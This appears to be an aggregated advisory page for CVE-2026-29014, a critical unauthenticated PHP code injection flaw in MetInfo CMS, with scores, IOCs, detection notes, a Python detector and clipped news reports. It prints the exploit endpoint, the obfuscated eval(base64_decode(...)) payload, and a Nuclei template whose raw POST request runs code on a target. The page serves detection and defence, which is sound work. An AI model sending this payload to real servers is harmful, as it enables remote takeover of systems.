CVE-2026-29014
Published: 2026-04-01
Priority: P194 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 39.69% (98.4th percentile)
MetInfo CMS versions 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability that allows remote attackers to execute arbitrary code by sending crafted requests with malicious PHP code. Attackers can exploit insufficient input neutralization in the execution path to achieve remote code execution and gain full control over the affected server.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| metinfo | metinfo | — | — |
| metinfo | metinfo | — | — |
| metinfo | metinfo | — | — |
| metinfo_cms | metinfo_cms | 7.9.0 – 8.1.0 | — |
Detection & IOCs
url: /app/system/entrance.php?n=include&m=module&c=weixin&a=doapi
command: ${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)])))}
other: Content-Type: application/xml with header C: {{base64("echo {{num1}}*{{num2}};die();")}}}
- Monitor for POST requests to /app/system/entrance.php with query parameters n=include&m=module&c=weixin&a=doapi and Content-Type: application/xml, which is the exploit delivery endpoint for CVE-2026-29014.
- Detect PHP code injection payloads in HTTP headers or XML body targeting MetInfo, specifically use of eval(base64_decode($_SERVER[...])) patterns delivered via the custom 'C' HTTP header.
- Exploitation activity has been observed originating from China and Hong Kong IP addresses; geo-filter or alert on inbound requests to MetInfo endpoints from these regions, especially after April 25, 2026.
- Affected versions are MetInfo CMS 7.9, 8.0, and 8.1; patches were released April 7, 2026. Instances not yet patched remain at critical risk (CVSS 9.8).
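
The first two detection notes above, applied to parsed request records, as an added example that is not taken from the page's sources. The record shape (a dict with `method`, `url`, `headers`, `body`), the function names and the `SAMPLES` records are assumptions made for illustration; query parameters are matched in any order and header names case-insensitively.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the detection notes above.
ENDPOINT = "/app/system/entrance.php"
ROUTE = {"n": "include", "m": "module", "c": "weixin", "a": "doapi"}
EVAL_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$_SERVER", re.I)


def is_base64(value):
    """True if value is non-empty and strictly valid base64."""
    try:
        return bool(value) and bool(base64.b64decode(value, validate=True))
    except (binascii.Error, ValueError):
        return False


def indicators(req):
    """Return the names of the CVE-2026-29014 indicators one request matches."""
    hits = []
    url = urlsplit(req["url"])
    query = {k: v[-1] for k, v in parse_qs(url.query).items()}
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    on_route = url.path.lower().endswith(ENDPOINT) and all(
        query.get(k) == v for k, v in ROUTE.items())
    if req["method"].upper() == "POST" and on_route:
        hits.append("weixin_doapi_post")
        if "application/xml" in headers.get("content-type", "").lower():
            hits.append("xml_content_type")
    if is_base64(headers.get("c", "")):
        hits.append("base64_c_header")
    if EVAL_RE.search("\n".join([req.get("body", ""), *headers.values()])):
        hits.append("eval_base64_server")
    return hits


# Constructed sample records (not captured traffic); payload elided with "...".
SAMPLES = [
    {"method": "POST",
     "url": "/app/system/entrance.php?a=doapi&c=weixin&m=module&n=include",
     "headers": {"Content-Type": "application/xml", "c": "Y29uc3RydWN0ZWQ="},
     "body": "{${eval(base64_decode($_SERVER[...]))}}"},
    {"method": "GET",
     "url": "/app/system/entrance.php?n=include&m=module&c=news&a=dolist",
     "headers": {"Accept": "text/html"}, "body": ""},
]
RESULTS = [indicators(sample) for sample in SAMPLES]
```

A short `C` header that happens to be valid base64 will also raise `base64_c_header`, so treat that indicator as supporting evidence next to the route match rather than as an alert on its own.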
CVSS provenance
nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd · v4.0 · 9.3 CRITICAL · CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck · 9.3 CRITICAL
GHSA
GHSA-wqc8-9v27-r965: MetInfo CMS versions 7
ghsa_unreviewed·2026-04-01
CVE-2026-29014 [CRITICAL] CWE-94 GHSA-wqc8-9v27-r965: MetInfo CMS versions 7
VulnCheck
metinfo metinfo Improper Control of Generation of Code ('Code Injection')
vulncheck·2026·CVSS 9.3
CVE-2026-29014 [CRITICAL] metinfo metinfo Improper Control of Generation of Code ('Code Injection')
Affected: metinfo metinfo
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2026-29014&date=2026-04-25
No detection rules found.
Nuclei
MetInfo CMS <= 8.1 - Remote Code Execution
nuclei·CVSS 9.3
CVE-2026-29014 [CRITICAL] MetInfo CMS <= 8.1 - Remote Code Execution
MetInfo CMS eventSCANadminlogin&../config/tables{${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)]))}}.{${die()}}
```yaml
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "success")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /app/system/entrance.php?n=include&m=module&c=weixin&a=doapi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml
        C: {{base64("echo {{num1}}*{{num2}};die();")}}

        eventSCANadminlogin&Array
    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "text/html")'
          - 'contains(body, "{{result}}")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502201b950d08df779c1d71a849dba498de9dd2ea3d37572231c6689e22cb3a0d202102210081a12c8848627e22860d278ff07ac6350ea5241537add9109ef2f428eb4cb622:922c64590222798bb761d5b6d8e72950
```
Hackernews
⚡ Weekly Recap: Linux Rootkit, macOS Crypto Stealer, WebSocket Skimmers and More
blogs_hackernews·2026-05-11·CVSS 9.3
CVE-2026-6973 [CRITICAL] ⚡ Weekly Recap: Linux Rootkit, macOS Crypto Stealer, WebSocket Skimmers and More
## ⚡ Weekly Recap: Linux Rootkit, macOS Crypto Stealer, WebSocket Skimmers and More
Rough Monday.
Somebody poisoned a trusted download again, somebody else turned cloud servers into public housing, and a few crews are still getting into boxes with bugs that should’ve died years ago — the same old holes, same lazy access paths, same “how the hell is this still open” feeling. One report this week basically reads like a guy tripped over root access by accident and decided to stay there.
The weird part is how normal this all sounds now. Fake updates. Quiet backdoors. Remote tools are used like skeleton keys. Forum rats swapping st
Hackernews
MetInfo CMS CVE-2026-29014 Exploited for Remote Code Execution Attacks
blogs_hackernews·2026-05-05·CVSS 9.3
CVE-2026-29014 [CRITICAL] MetInfo CMS CVE-2026-29014 Exploited for Remote Code Execution Attacks
## MetInfo CMS CVE-2026-29014 Exploited for Remote Code Execution Attacks
Threat actors are actively exploiting a critical security flaw impacting an open-source content management system (CMS) known as MetInfo, according to new findings from VulnCheck.
The vulnerability in question is CVE-2026-29014 (CVSS score: 9.8), a code injection flaw that could result in arbitrary code execution.
"MetInfo CMS versions 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability that allows remote attackers to execute arbitrary code by sending crafted requests with malicious PHP code," the NIST National Vulnerability Dat
- https://karmainsecurity.com/KIS-2026-06
- https://www.metinfo.cn/
- https://www.vulncheck.com/advisories/metinfo-cms-unauthenticated-php-code-injection-rce
- http://seclists.org/fulldisclosure/2026/Apr/1
- https://websec.net/blog/cve-2026-29014-metinfo-cms-unauthenticated-php-code-injection-69cdc290c14a8a99e1f91b7a